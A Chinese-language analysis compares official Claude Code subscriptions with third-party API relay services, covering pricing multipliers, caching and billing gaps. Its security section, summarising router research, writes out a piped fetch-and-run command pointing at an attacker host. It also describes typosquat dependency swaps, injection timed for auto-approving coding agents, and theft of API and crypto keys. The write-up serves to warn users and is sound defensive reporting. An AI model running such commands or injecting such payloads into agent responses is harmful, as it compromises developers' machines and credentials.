Claude Code 官方订阅 vs 中转站

一、什么是中转站？什么是 CC 官方订阅？

Claude Code 与 API 的关系

Claude Code（简称 CC）是 Anthropic 推出的终端编码代理。它调用 Claude 模型执行代码编写、调试、重构等任务，每一次交互都会消耗 token。

使用 Claude Code 有两条路径：

官方订阅：在 Anthropic 官网购买 Pro / Max 计划，通过官方服务器直连模型
API 接入：通过 Anthropic API 或第三方转发服务（即”中转站”）接入模型

什么是中转站

中转站是一种第三方中间商服务。它在你和 Anthropic（或 AWS Bedrock 等模型托管平台）之间充当转发代理：接收你的请求，转发给上游模型提供商，再把响应返回给你。

中转站存在的原因：

国内用户无法直接访问 Anthropic 官网或支付美元
官方 API 按量计费价格高昂
官方 Max 订阅存在支付门槛和封号风险

绝大多数中转站的计费后台基于开源项目 One-API（30.5K GitHub stars，119 万 Docker pulls）及其分支 new-api（25.4K stars，125 万 Docker pulls），提供统一的额度管理和模型路由能力。

CC 官方订阅档位

Anthropic 官方对额度的描述含糊不清（“5 小时内约 50-200 个提示”），但通过逆向工程（详见第五章）已经完整破解了真实额度：

套餐	月价	5h Credit 限额	周 Credit 限额	缓存策略
Pro	$20（≈¥144）	550,000（1×）	5,000,000（1×）	5min 缓存写入
Max 5×	$100（≈¥720）	3,300,000（6×）	41,666,700（8.33×）	1h 缓存写入
Max 20×	$200（≈¥1,440）	11,000,000（20×）	83,333,300（16.67×）	1h 缓存写入

注意两个被官方隐藏的事实：

Max 5× 的周限是 Pro 的 8.33 倍（不是名义上的 5 倍）——5× 是性价比甜点
Max 20× 的周限只有 Pro 的 16.67 倍（不是 20 倍）——20× 的边际收益递减

所有订阅计划共享一个关键特性：CacheRead 完全免费。这是理解后续所有成本分析的核心前提。

二、中转站的渠道来源与各渠道的问题

你在中转站买的每一个”刀”，背后可能是完全不同的货源。目前市面上的 Claude Code 中转渠道主要有五类，每一类的技术架构、风险和实际体验差异巨大。

1. 逆向渠道（kior、反重力等）

原理：从 Antigravity、Cursor 等第三方客户端中逆向提取 API 接口，封装成 OpenAI 兼容格式出售。

技术架构：后台维护一个逆向出来的 API key 池。你每次请求被随机分配到池中某个 key 上轮询。

致命问题：

提示词污染：逆向出来的 API 携带源平台自身的系统提示词（比如反重力的专属 prompt），这些 prompt 会混入你的上下文，直接造成降智
缓存为零：key 池轮询意味着你的下一个请求几乎不可能路由回上一个 key。Claude 的缓存机制要求同一个 key 的连续请求才能命中缓存——轮询直接打碎了这个前提
双重亏损：没有缓存 = 所有 token 按新建计费（成本翻倍）+ 模型丢失上下文缓存（思考不连贯 = 降智）

逆向渠道是所有渠道里最差的：你付的钱买到了更贵的账单和更蠢的模型。

2. AWS Bedrock / Azure / GCP 多对多（key 池模式）

原理：商家在 AWS Bedrock 等云平台上部署 Anthropic 官方模型，申请多个 IAM 账号的 API key，组成 key 池对外出售。

技术架构：你的请求在多个 AWS API key 之间轮询，每个 key 对应一个独立的模型实例。

优点：模型本身是 Anthropic 官方正品，支持 1M 上下文、1h 缓存。智力水平不降智。

致命问题：

缓存命中率极低：和逆向渠道同理——key 池轮询导致你的请求无法稳定路由到同一个 key，缓存几乎建立不起来
标价便宜但实际消耗高：标价 0.1-0.3 元/刀看似极低，但因为没有缓存，所有 token 都按 fresh input + cache write 计费，实际单次请求成本远高于有缓存的方案

这类渠道的本质矛盾：模型没问题，但架构决定了缓存用不上——最贵的那部分成本（缓存写入）你每次都要重新付。

3. AWS Bedrock 一对一（专属模型）

原理：商家部署一个专属模型实例，分配固定 API key 给你的团队使用。所有请求路由到同一个模型。

技术架构：一对一绑定，等同于你自己在 AWS 上开了一个 Bedrock 实例。

优点：完整缓存、满血智力、1M 上下文、1h 缓存。体验与官方 API 无异。

致命问题：

价格昂贵：按 Anthropic API 官方定价计费。经过渠道折扣后，普通用户到手约 3.5 元/刀，企业大户谈到极限约 1 元/刀
本质上就是 API：你付的是 API 价格，和 Max 订阅的「缓存读免费」优势完全无关

这是体验最好但最贵的中转渠道。但既然都花这个钱了，为什么不直接订 Max？

4. Max 号池 / sub2api 中转站

原理：商家批量开 Max 订阅账号，通过 sub2api 或 CRS（claude-relay-service）反代成 OpenAI 兼容 API，按号池轮询对外出售。

技术架构：后台几十到几百个 Max 账号组成号池。sub2api 按 API 定价算法对每个用户计量额度。

致命问题：

计费算法错位：sub2api 默认使用 API 定价算法（CacheRead 收费 $0.5/M token），但 Max 账号的真实消耗使用官方算法（CacheRead 免费）。同样的使用量，sub2api 后台显示的消耗是官方真实消耗的 2-8 倍
缓存不稳定：号池的号额度用光就轮换。换号 = 缓存消失 = 下一个请求全部重新写入。即使商家算法优化做得好（尽量保持同一用户 session 在同一账号），也无法保证 1 小时内不换号
封号风险传导：sub2api 的 TLS 握手指纹与 Claude Code 原生不一样，Anthropic 技术上可以识别。2026 年 3 月严打后翻车率激增
超卖套利空间大：因为 API 刀 ≈ 2-4 倍官方刀，车头按 API 刀算限额、按官方刀用实际额度，中间的差额就是利润——四人车可以按八人卖

sub2api 中转站赚的就是「两种刀之间的汇率差」。行规心照不宣，没人有动机戳破。

5. OpenRouter / ZenMux 等聚合平台

原理：聚合多家模型提供商，提供统一 API 接口。背后可能是自部署模型或直接转发。

现状：缓存表现和定价取决于具体实现，缺乏透明度。中国用户使用时常经过多层代理链路。

这类平台的核心问题是不透明：你不知道请求实际经过了几跳，每一跳都是一个潜在的安全和成本风险点。

三、中转站的倍率体系与计价陷阱

中转站的价格页面上写满了”倍率""汇率""分组”这些术语。这套体系源自 One-API 的统一换算框架，把不同价格的模型全部折算到一个内部额度单位中。

核心基准：$1 额度 = 500,000 基准 Tokens（以早期模型 davinci-002 的 $2/1M tokens 定价为基准）。

你需要知道的五个概念

术语	含义	对你的影响
充值汇率	你花多少人民币换 1 美元站内额度	连接你的钱包和站内额度的桥梁
模型倍率	中转站给某模型设定的输入价 ÷ 2.00	决定基础单价。倍率越高，模型越贵
补全倍率	模型输出价 ÷ 输入价	决定额度消耗速度。AI 生成回答通常比输入贵，Opus 的补全倍率是 5
分组倍率	你所在用户组的额外乘数	最容易被忽略的隐藏加价。“高速官转”组可能是 2×，默认组是 1×
官方标准模型倍率	官方输入价 ÷ 2.00（黄金标尺）	衡量中转站定价是否公道的基准线

核心公式

官方标准模型倍率（用来当标尺）：

官方标准模型倍率 = 官方模型输入价格 ($/1M tokens) ÷ 2.00

主要模型的官方标准倍率速查：

模型	官方输入价 ($/1M)	官方标准模型倍率
claude-3-haiku	$0.25	0.125
claude-3.5-sonnet	$3.00	1.5
claude-3-opus	$15.00	7.5
gpt-4o-mini	$0.15	0.075
gpt-4o	$5.00	2.5
gemini-1.5-pro	$3.50	1.75

中转站实际价格（终极公式）：

                    中转站设定的模型倍率
实际价格(元) = ─────────────────────── × 分组倍率 × 充值汇率
                    官方标准模型倍率

这个公式的含义是：为了获得官方 $1 等效的服务，你在这家中转站实际需要支付多少人民币。

额度扣费公式（你的余额是怎么被扣的）：

                 分组倍率 × 模型倍率 × (输入Token数 + 输出Token数 × 补全倍率)
扣除额度($) = ────────────────────────────────────────────────────────────────
                                       500,000

实例演算：一家中转站到底贵不贵？

以一家虚构的”FakeAI”中转站为例：

已知条件：
├── 充值汇率 = 1（1 元人民币 = 1 美元站内额度）
├── 目标模型：gpt-4o-mini
├── 中转站将 gpt-4o-mini 输入价定为 $0.60/1M tokens
│   → 中转站模型倍率 = 0.60 ÷ 2.00 = 0.3
├── 分组："高速官转"，分组倍率 = 2
└── 官方 gpt-4o-mini 输入价 $0.15/1M
    → 官方标准模型倍率 = 0.15 ÷ 2.00 = 0.075

代入终极公式：
实际价格 = (0.3 ÷ 0.075) × 2 × 1 = 4 × 2 × 1 = 8.00 元

结论：在 OpenAI 官网花 1 美元（≈7.3 元）就能用的 gpt-4o-mini，在这家中转站要花 8 元人民币。这是一个溢价渠道。

同样的方法算 Claude Opus：

某中转站 claude-3-opus 设定：
├── 中转站输入价 $18/1M → 模型倍率 = 18 ÷ 2 = 9
├── 官方标准模型倍率 = 15 ÷ 2 = 7.5
├── 分组倍率 = 1.5（"稳定渠道"组）
├── 充值汇率 = 6.67（充 100 元 = 15 美元额度）

实际价格 = (9 ÷ 7.5) × 1.5 × 6.67 = 1.2 × 1.5 × 6.67 = 12.0 元

官方 $1 ≈ 7.3 元，这家中转站要 12 元，溢价 64%。

三步速判法：3 分钟看穿任何中转站

第一步：找到三个数字

充值汇率是多少？（充 100 元给 15 美元额度 → 汇率 = 100÷15 ≈ 6.67）
你常用模型的模型倍率是多少？（若网站只标美元价格 → 倍率 = 输入价 ÷ 2）
你的账户分组倍率是多少？（若无特殊说明，默认 1）

第二步：查官方标准模型倍率（见上表）

第三步：代入公式，和实时汇率（约 7.3 元/美元）比较

实际价格 = (中转站模型倍率 ÷ 官方标准模型倍率) × 分组倍率 × 充值汇率

实际价格 < 7.3：折扣渠道，数字越小越划算
实际价格 ≈ 7.3：价格公道，与官方成本持平
实际价格 > 7.3：溢价渠道，你在为中转/稳定/特殊功能额外付费

常见的三个「猫腻」

猫腻一：模型倍率虚高

中转站自行设定模型倍率，不受约束。官方 Opus 标准倍率 7.5，中转站设成 9 甚至 12——你在价格页面看不出来，因为页面可能只显示”Opus: $18/1M”，不会告诉你官方只要 $15/1M。

猫腻二：分组倍率隐藏加价

这是最容易被忽略的暗坑。很多中转站按用户等级设置不同分组：免费组 1×，普通组 1.5×，“高速官转”组 2×。你看到的模型倍率一模一样，但实际扣费翻了 1.5-2 倍。务必确认自己账户是否被放进了高分组倍率的用户组。

猫腻三：低汇率 + 高倍率的组合拳

极低的充值汇率（如 1:1）往往伴随着极高的模型倍率。你被低汇率吸引充了钱，但模型倍率设成官方的 2-4 倍——综合下来比 1:7 汇率 + 标准倍率还贵。永远不要只看充值汇率，必须三个数字一起算。

某中转站声称”1:1 官方价”，为什么算出来还是更贵？检查三个点：① 模型倍率是否大幅高于官方 ② 你是否被放进了高分组倍率的用户组 ③ 充值汇率是否高于市场实时汇率。三者任意一个偏高，实际成本都会上升。

四、计费算法到底怎么算？数字说话

上一章分析的是中转站倍率体系对「标价」的加价。本章分析的是一个更隐蔽的问题——中转站和官方用的根本不是同一套计费算法，同样的使用量算出来的消耗可以差 2-8 倍。

定义：市面上存在三种「刀」

同一个”刀”字，背后是完全不同的计算公式：

API 刀（sub2api / ccusage / Cursor 使用）:
  费用 = Input×$5 + Output×$25 + CacheWrite×$6.25 + CacheRead×$0.5

CC 官方刀 Max（Max 5×/20× 的真实消耗）:
  费用 = Input×$5 + Output×$25 + CacheWrite×$10 + CacheRead×$0（免费）

CC 官方刀 Pro（Pro $20 的真实消耗）:
  费用 = Input×$5 + Output×$25 + CacheWrite×$6.25 + CacheRead×$0（免费）

核心差异就一个：CacheRead 是否收费。

Max 的 CacheWrite 单价更高（$10 vs $6.25，因为 Max 是 1h 缓存，Pro 是 5min 缓存），但 CacheRead 完全免费。API 算法的 CacheWrite 便宜但 CacheRead 收 $0.5/M token。

CacheRead 占比有多大？

这是决定两种刀汇率差的关键参数。实测编码场景下：

一天真实用量分布（500K 上下文）：
├── Input        ≈   3,894 tokens（<1%）  ← 你打的那几个字
├── Output       ≈ 117,481 tokens（~1%）
├── CacheWrite   ≈  14M tokens  （~29%）
└── CacheRead    ≈ 472M tokens  （~70%） ← 这块官方免费，API 收钱

用这组真实数据，分别按两种算法计算同一天的消耗：

官方刀算法:
  3894×$5/M + 117481×$25/M + 14M×$10/M + 472M×$0/M
  = $0.02 + $2.94 + $140 + $0
  = $143

API 刀算法:
  3894×$5/M + 117481×$25/M + 14M×$6.25/M + 472M×$0.5/M
  = $0.02 + $2.94 + $87.5 + $236
  = $326

同一天、同样的使用量：官方算 $143，API 算 $326。汇率 1:2.28。

这还只是 500K 上下文。上下文越大，CacheRead 占比越高，汇率差越大：

平均上下文	CacheRead 占比	API 刀 : 官方刀
250K	~60%	1 : 2
500K	~70%	1 : 4
1M	~85%	1 : 8

不手动 /compact 或 /clear 的话，8 小时连续编码上下文就能涨到 500K，两天到 1M。上下文越大，中转站的「汇率税」越重。

这个汇率差怎么验证？

只有按官方刀算法得到的金额 ÷ 5h 限额 $82.5（Max 5× 的单窗口美元等效），算出的百分比才能和 Claude Code 内 /usage 显示的百分比对齐。

如果按 API 刀算，得到的百分比是 /usage 的 2-3 倍——一个人一天就能”用掉”三人车的全部官方额度，这在逻辑上不可能。

有用户实测：oauth 直连 20× 三人车，自己一天 sub2api 后台显示 $326，但三个人加起来的 5h×3 官方总额也才 $246。API 刀的数字是虚高的。

sub2api 拼车中车头的四种算法策略

这直接决定你作为乘客实际拿到多少额度：

车头策略	乘客算法	车头自留	后果
A. 良心车头	官方刀（CacheRead 免费）	公平分配	不浪费，公平
B. 不知情车头	API 刀 + 按官方总额分配	浪费归零	浪费高达 50% 额度，但车头也不知道
C. 精明车头	API 刀 + 自留差额	40%+ 归车头	四人车车头实际拿到近一半额度
D. 超卖车头	API 刀 + 超卖人数	利润翻倍	四人车按八人卖，乘客不知道车里几个人

大多数车头处于 B 或 C 的状态。 A 需要车头主动修改 sub2api 的计费算法设置，但 sub2api 默认就是 API 算法。D 是行业潜规则——乘客无法验证车内实际人数。

「为什么没人说这个秘密？」——中转站老板知道但没有动机戳破，因为赚的就是两种刀之间的汇率差。

倍率陷阱 + 两种刀 = 双重加价

第三章的倍率体系和本章的「两种刀」问题是叠加关系：

你实际支付的钱
  = 倍率体系的加价（模型倍率 × 分组倍率 × 充值汇率）
  × 两种刀的汇率差（CacheRead 收费导致的 2-8 倍膨胀）

以一个「看似公道」的中转站为例：

倍率体系：实际价格 = 8.5 元（溢价 16%，看起来还行？）
两种刀加价：500K 上下文 → API 刀是官方刀的 4 倍
综合成本：8.5 × 4 = 34 元 ≈ 等效 $4.7

而 Max 5× 的官方等效：0.34 元/刀 × 7.3 = 2.5 元 ≈ $0.34

实际贵了 13.8 倍。

五、CC 官方订阅的真实额度和性价比

Credit 系统逆向

安全研究者 she-llac 通过抓包 Claude SSE 响应中未四舍五入的 usage_ratio 浮点数（如 0.16327272727272726），利用 Stern-Brocot 树恢复精确分数，再对大量请求做控制变量实验，完整破解了 Claude 的 Credit 计费体系。

Credit 换算公式：

credits_used = input_tokens × R_in + output_tokens × R_out

各模型费率（credits/token）：
           Input        Output
Haiku:     2/15         10/15
Sonnet:    6/15         30/15
Opus:      10/15        50/15

三大规律：
  Output = Input × 5（所有模型）
  Opus = Haiku × 5
  Sonnet = Haiku × 3

统一换算：7.5 美元 = 1M Credits

订阅 vs API 的价值对比

套餐	月 Credits	月等效 API $	订阅价	性价比倍数
Pro $20	21.7M	$163	$20	8.1×
Max 5× $100	180.6M	$1,354	$100	13.5×
Max 20× $200	361.1M	$2,708	$200	13.5×

以上为无缓存下界。加入缓存后，因为 CacheRead 免费，价值进一步飙升：

场景	订阅 Credits	API 等效 $	Max 5× 周容量	月等效 $	倍数
冷缓存（100K 写 + 1K 出）	70,000	$0.65	595 次/周	$1,676	16.8×
热缓存（100K 读 + 1K 写 + 1K 出）	4,000	$0.08	10,416 次/周	$3,667	36.7×

热缓存场景下，$100 订阅拿到 $3,667 的 API 等效价值——超过 36 倍。

真实采购价推导

按实测一周编码记录（CacheRead 命中 83%）：

无缓存基准 = ¥720 ÷ ($1,354 ÷ ¥7.2/刀) = 0.53 元/刀
缓存命中 83% → 加成系数 1.558 → 实际 = 0.53 ÷ 1.558 = 0.34 元/刀

Max 5× 的等效采购价：0.34 元/刀。 这是后续所有对比的基准线。

六、中转站的安全风险

以上分析的全是经济账。但中转站的风险远不止多花钱——你的代码、密钥和对话内容正面临三类完全不同的安全威胁。

6.1 技术层面：载荷注入与凭据窃取（UCSB 实证）

UCSB（加州大学圣塔芭芭拉分校）在 2026 年 4 月发表的学术论文（arxiv:2604.08407）首次系统性量化了 LLM 中转路由器的安全风险。

研究规模：28 个付费路由器（淘宝/闲鱼/Shopify）+ 400 个免费路由器（sub2api/new-api 模板）。

行为	付费（28 个）	免费（400 个）
主动注入恶意代码	1	8
自适应规避（前 N 次正常，之后注入）	0	2
窃取 AWS 凭据	0	17
盗取 ETH 私钥	0	1

四类攻击手段：

载荷注入：把模型返回的 curl https://正常.sh | bash 替换为 curl https://攻击者.sh | bash。修改后仍是合法 JSON，不触发任何异常
依赖投毒：把 pip install requests 替换为 pip install reqeusts（typosquat），绕过域名白名单
条件触发：前 50 次请求表现正常，只在 YOLO 模式 + Rust/Go 项目时注入——你的烟雾测试永远测不出来
被动窃取：扫描流量中的 API key、AWS key、GitHub Token、ETH 私钥，异步泄露但不改响应——你完全无感

蜜罐实验：研究者部署弱配置蜜罐后被自动纳入中转链路——4 万次未授权访问，20 亿 tokens 流量（~13 GB 明文），99 个凭据泄露跨 440 个 Codex 会话，其中 401 个处于 YOLO 自动批准模式。

跨框架测试：Claude Code、Codex、OpenCode、OpenClaw —— 0/4 实现了响应完整性校验。载荷注入兼容率 100%。

供应链最弱链：你 → 淘宝卖家 → 二级聚合商 → OpenRouter → 模型主机。每一跳终止并重建 TLS，每一跳拥有明文读写权。只要链中任一节点恶意，整条链路的完整性即被破坏。

6.2 产业链层面：黑卡、退款流与”三头吃”

中转站背后的产业链远比你想象的复杂。来自多位站长和行业内部人士的公开信息揭示了完整的利润链条：

号源的四种来源：

来源	成本	说明
黑卡盗刷	近零	利用支付验证漏洞批量注册，封号后申请退款，成本趋近于零
逆向反代	低	破解 Kiro/Cursor/Antigravity 的内部接口，把客户端订阅额度转卖
云厂商 Credit 灰色流转	中	AWS/Azure/GCP 发给初创公司的算力额度被违规倒卖
企业折扣协议	高	合法正规，但利润最薄

“三头吃”盈利模式——一些中转站同时从三个方向赚钱：

第一头：收你的充值费用
第二头：用批量注册的账号白嫖额度，封号后退款——等于用官方的钱来服务你
第三头：你的所有输入输出都是明文，打包卖给需要训练数据的买家

有站长公开表示收到了数据购买请求但拒绝了——他拒绝了，不代表别人也拒绝。

跑路生命周期：低价+送额度吸引用户 → 规模大了涨价降稳定性 → 群里吐槽就封号踢人 → 某天域名消失，余额归零。

6.3 模型注水：你用的可能不是 Opus

界面显示 claude-opus-4，后台跑的可能是 gpt-5.4 甚至某个 7B 开源模型。这就是业内所说的”换头术”。

注水的经济动机：圈内 gpt-5.4 成本约 4 分/次，ccmax Opus 成本要 1 块 5——中间差了 几十倍。有的中转站十次注 1-2 次水，用户很难察觉。

学术实证（CISPA 亥姆霍兹信息安全中心，arxiv:2603.01919）：

被测 24 个 API 端点中，超过半数在后台换了模型
用假模型每花 $1，错误数量是官方 API 的 2-4 倍
187 篇学术论文在用这些假 API 跑实验，其中 62% 已被 ACL/CVPR 等顶会接收

SLA 承诺的真相（来自站长公开发言）：

“市面上敢承诺 SLA 的全都是注水大户”——风控一提高账号成片死，不标红的基本都是逆向渠道
所有号称能”网页检测满血 CC”的工具全是智商税——只查几个 tools 字段和特定返回值，逆向渠道可以完美伪装
有大佬可以把 kiro/gpt-5.4 完美伪装成 ccmax 通过市面上所有的网页检测手段

唯一相对可靠的注水检测方法：拿中转返回的思考块签名，提交到官方 ccmax 进行验证。逆向渠道的签名不会被官方认证，直接返回报错。

6.4 数据风险：你是付费客户，也是免费的训练数据

所有经过中转的请求——完整的 prompt + response——就是一份现成的蒸馏数据。

尤其是 Claude Code 这类编程场景，用户产出的全是复杂推理链和真实的工程决策，对模型厂商来说是梦寐以求的蒸馏素材。

“中转站真正的商业模式很可能是：收你中转费是表面生意，把你的请求数据打包卖给大厂做模型蒸馏，才是核心 margin。”

“有些中转站上线的核心目的根本不是卖 API，而是为了收集特定场景的高质量蒸馏语料。低价只是获客手段。”

已知证据：

Telegram 上有人向站长出价购买用户数据（截图已公开）
V2EX 上有站长承认收到买数据的报价

防护建议：

关键密钥和私钥放到 Agent 不能读取的目录（.gitignore / .claudeignore）
环境变量不要以明文形式出现在代码或提示词中
使用中转站时，假设所有输入输出都会被永久存储

七、总结：中转站 vs 官方 CC 订阅

维度	官方 Max 5×	逆向中转	Bedrock 多对多	Bedrock 一对一	sub2api 拼车
标价	¥720/月	0.5-1 元/刀	0.1-0.3 元/刀	~1-3.5 元/刀	1-1.5 元/刀
计费算法	官方刀	API 刀	API 刀	API 刀	API 刀
CacheRead	免费	收费	收费	收费	收费
缓存命中	~83%	~0%	~10%	~83%	不稳定
实际等效成本	0.34 元/刀	2-8 元/刀	0.8-2.4 元/刀	1-3.5 元/刀	2-12 元/刀
模型智力	满血 Opus	降智（污染+无缓存）	正常	满血	波动（可能注水）
注水风险	无	高（本身就是逆向）	低	低	中（十次注 1-2 次）
数据泄露	仅 Anthropic 可见	明文可被存储/售卖	明文可被存储	明文可被存储	明文可被存储/售卖
倍率加价	无	不透明	不透明	相对透明	不透明
代码安全	端到端直连	极高（注入+窃取）	高	中	高
上下文	200K→1M	取决于源	1M	1M	200K→1M

中转站的真实成本由三层加价叠加，外加三层安全风险：

经济成本 = 倍率加价（模型倍率 × 分组倍率 × 充值汇率）
         × 算法加价（CacheRead 收费导致的 2-8 倍膨胀）

安全成本 = 载荷注入风险（代码被篡改执行）
         + 数据泄露风险（对话被存储、售卖、用于蒸馏）
         + 模型注水风险（用低价模型冒充 Opus）

而 Max 5× 只有一个数字：0.34 元/刀——满血智力、完整缓存、端到端直连、零安全风险、零数据泄露。

所有中转渠道的实际等效成本都应该和 0.34 元/刀比较，而不是和标价比较。